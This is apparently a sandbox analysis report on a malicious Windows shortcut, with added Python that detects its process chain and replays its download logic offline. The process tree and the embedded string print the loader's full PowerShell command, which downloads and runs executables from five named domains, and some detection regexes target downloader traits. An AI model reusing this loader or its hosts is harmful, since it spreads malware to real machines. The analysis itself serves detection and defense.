Analysis

max time kernel: 149s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03/05/2024, 11:07
Static task: static1

Behavioral task: behavioral1
  Sample: 105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: 105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
  Resource: win10v2004-20240426-en
General

Target: 105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
Size: 2KB
MD5: 105e49bf1a9ac6a8f095ca1e9dfa5958
SHA1: ec9174ecb7de3a9ff2005dc726f4629e645d89d1
SHA256: 18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1
SHA512: 194d0f1d6cb6f7069b5684f2a977134c3c8f82e29b3cd0d09f34213f1473f5a297e6593c3fb2775789038204203d1028ae47272d46ea3d929b01d9cdc498ac32
Malware Config

(none extracted)

Signatures

Blocklisted process makes network request (6 IoCs)
flow | pid  | Process
5    | 2904 | powershell.exe
6    | 2904 | powershell.exe
7    | 2904 | powershell.exe
9    | 2904 | powershell.exe
11   | 2904 | powershell.exe
12   | 2904 | powershell.exe

Command and Scripting Interpreter: PowerShell (1 IoCs; signature name taken from the process tree, where it is attached to PID 2904)
pid  | Process
2904 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings (9 IoCs; signature name taken from the process tree, where it is attached to PID 2552)
description     | ioc | Process
Key created     | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Key created     | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created     | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created     | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE

Note that every value here points at Office's own binaries (EXCEL.EXE, ONBttnIE.dll) and registers the stock "Export to Microsoft Excel" and "Send to OneNote" IE menu extensions; this is Office writing its defaults when WINWORD.EXE opens the decoy a.doc, not attacker-controlled persistence.

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid  | Process
2552 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid  | Process
2904 | powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description             | pid  | Process
Token: SeDebugPrivilege | 2904 | powershell.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
pid  | Process
2552 | WINWORD.EXE (7 entries)

Suspicious use of WriteProcessMemory (7 IoCs)
description                        | pid  | Process        | procid_target
PID 1136 wrote to memory of 2904   | 1136 | cmd.exe        | 29 (3 entries)
PID 2904 wrote to memory of 2552   | 2904 | powershell.exe | 30 (4 entries)
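The signatures above, read together with the WriteProcessMemory rows (cmd.exe 1136 writing into 2904, powershell.exe 2904 writing into 2552), describe a cmd.exe, then powershell.exe, then WINWORD.EXE chain launched from a .lnk. As an added example, not part of the Triage report, the following Python runs a small detection over constructed process-creation events modelled on that chain plus one benign PowerShell launch for contrast. The event field names (pid, ppid, image, cmd), the abridged PowerShell command line and the benign event are assumptions made for the example.

```python
import ntpath
import re

# Constructed sample events (Sysmon Event ID 1 style: pid, ppid, image, command line),
# modelled on the report's process tree. The PowerShell command line is abridged to the
# parts the rules look at; the explorer.exe/inventory.ps1 events are a benign contrast.
EVENTS = [
    {"pid": 1136, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r"cmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk"},
    {"pid": 2904, "ppid": 1136, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile '
            r'-command function goe { return New-Object System.Net.WebClient; }; $y = goe; '
            r'$y.DownloadFile($u, $f); Start $f'},
    {"pid": 2552, "ppid": 2904, "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc"'},
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\Scripts\inventory.ps1'},
]

# Command-line traits seen in the sandboxed loader. Each alone is noisy (plenty of admin
# scripts bypass the execution policy), so the chain check below requires several at once.
POWERSHELL_RULES = [
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    ("inline_command", re.compile(r"-command\s", re.I)),
    ("webclient_download", re.compile(r"Net\.WebClient|DownloadFile|DownloadString", re.I)),
    ("launches_downloaded_file", re.compile(r"\bStart(-Process)?\s+\$", re.I)),
]


def score_powershell(cmd):
    """Return the names of the suspicious traits present in a PowerShell command line."""
    return [name for name, rx in POWERSHELL_RULES if rx.search(cmd)]


def find_lnk_downloader_chains(events, min_hits=3):
    """Flag powershell.exe processes whose parent is cmd.exe invoking a .lnk and whose
    command line shows at least min_hits loader traits. Returns one record per hit with
    the children it spawned (WINWORD.EXE opening the decoy, in the report's case)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        parent_is_lnk_launch = (
            parent is not None
            and ntpath.basename(parent["image"]).lower() == "cmd.exe"
            and ".lnk" in parent["cmd"].lower()
        )
        matched = score_powershell(e["cmd"])
        if parent_is_lnk_launch and len(matched) >= min_hits:
            children = [ntpath.basename(c["image"]) for c in events if c["ppid"] == e["pid"]]
            hits.append({"pid": e["pid"], "parent_pid": parent["pid"],
                         "matched": matched, "children": children})
    return hits


if __name__ == "__main__":
    for hit in find_lnk_downloader_chains(EVENTS):
        print(hit)
```

The parent check is what keeps this rule quiet on ordinary scripted administration: a signed script run from explorer.exe with -File matches none of the traits, while the report's chain matches all four.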
Processes

C:\Windows\system32\cmd.exe (PID 1136)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2904, child of 1136)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; };notepad.exe
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2552, child of 2904)
      Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc"
      - Modifies Internet Explorer settings
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx
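The PowerShell command line carried by the .lnk is the loader's entire logic: it writes a 2000-character decoy a.doc of random bytes to %TEMP% and opens it (hence WINWORD.EXE), then, guarded by an a.txt marker file so the stage runs once per host, walks five domains for two stages (a1.exe, a2.exe), executing whatever comes back if it is larger than 10000 bytes; $ld remembers the index of the first domain that delivered, so later stages start from that domain rather than from the top of the list. The added Python below is not part of the report: it parses that command line, reconstructs every candidate URL offline, and walks the same control flow against a constructed map of responses. The command line is copied from the tree above with the leading powershell.exe path dropped; the temp directory default and the response map are assumptions.

```python
import re

# Constructed input: the -command argument recorded in the process tree, copied verbatim.
LNK_COMMAND = r"""-ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; };notepad.exe"""


def extract_domain_list(cmd):
    """The $ll array: candidate download hosts in the order the loader tries them."""
    m = re.search(r"\$ll = ((?:'[^']*',?)+);", cmd)
    return re.findall(r"'([^']*)'", m.group(1))


def extract_path_prefix(cmd):
    """The $gop string before the stage number $n is appended."""
    return re.search(r"\$gop = '([^']*)'\+\$n;", cmd).group(1)


def extract_stage_count(cmd):
    """Upper bound of the for($n=1; $n -le N; ...) stage loop."""
    return int(re.search(r"for\(\$n=1; \$n -le (\d+); \$n\+\+\)", cmd).group(1))


def extract_size_threshold(cmd):
    """Minimum byte length before a downloaded file is executed ($var.length -gt N)."""
    return int(re.search(r"\$var\.length -gt (\d+)", cmd).group(1))


def candidate_urls(cmd):
    """Every URL the loader can request, across all stages and hosts, without any network I/O."""
    domains, prefix, stages = extract_domain_list(cmd), extract_path_prefix(cmd), extract_stage_count(cmd)
    return [f"http://{d}{prefix}{n}" for n in range(1, stages + 1) for d in domains]


def dropped_paths(cmd, temp=r"C:\Users\Admin\AppData\Local\Temp"):
    """Files the loader writes under $env:temp (default path assumed from the sandbox run)."""
    names = ["a.doc", "a.txt"] + [f"a{n}.exe" for n in range(1, extract_stage_count(cmd) + 1)]
    return [temp + "\\" + name for name in names]


def simulate(cmd, served):
    """Replay the nested download loops against `served`, a constructed url -> payload size
    map (absent = request failed, nothing on disk). Returns (urls attempted in order,
    files executed). Mirrors the $ld behaviour: once host i delivers, stage n+1 starts at i."""
    domains, prefix = extract_domain_list(cmd), extract_path_prefix(cmd)
    stages, threshold = extract_stage_count(cmd), extract_size_threshold(cmd)
    attempted, executed, ld = [], [], 0
    for n in range(1, stages + 1):
        for i in range(ld, len(domains)):
            url = f"http://{domains[i]}{prefix}{n}"
            attempted.append(url)
            size = served.get(url)
            if size is not None and size > threshold:  # undersized responses are skipped
                executed.append(f"a{n}.exe")
                ld = i
                break
    return attempted, executed


if __name__ == "__main__":
    for url in candidate_urls(LNK_COMMAND):
        print(url)
    prefix = extract_path_prefix(LNK_COMMAND)
    # Constructed scenario: only the third host answers, both stages.
    print(simulate(LNK_COMMAND, {f"http://pinkcamille.com{prefix}1": 20000,
                                 f"http://pinkcamille.com{prefix}2": 20000}))
```

The candidate list is the block-worthy artefact (ten URLs, two per host); the simulation shows why a single live host is enough for the loader to complete, and why the size threshold makes a sinkhole that returns a short page look like a failed host rather than a payload.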
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
MD5: 259d4d0838b6e0df6374c5c81d213f54
SHA1: 7d24482a10d90e71a275f42a92987879042c428f
SHA256: e7b3fbcacb8348b511ab51c48727f0c5d448185a2cbb84e7485b67f1efff24ae
SHA512: c540fbd80875d6538182152ad23afb25bb2c35eb3aacd28e28872b8f6584dbfc8372c1a0e3325a8fca79ad99972b0193197821d039a28eab721f7b2eeab2c6bc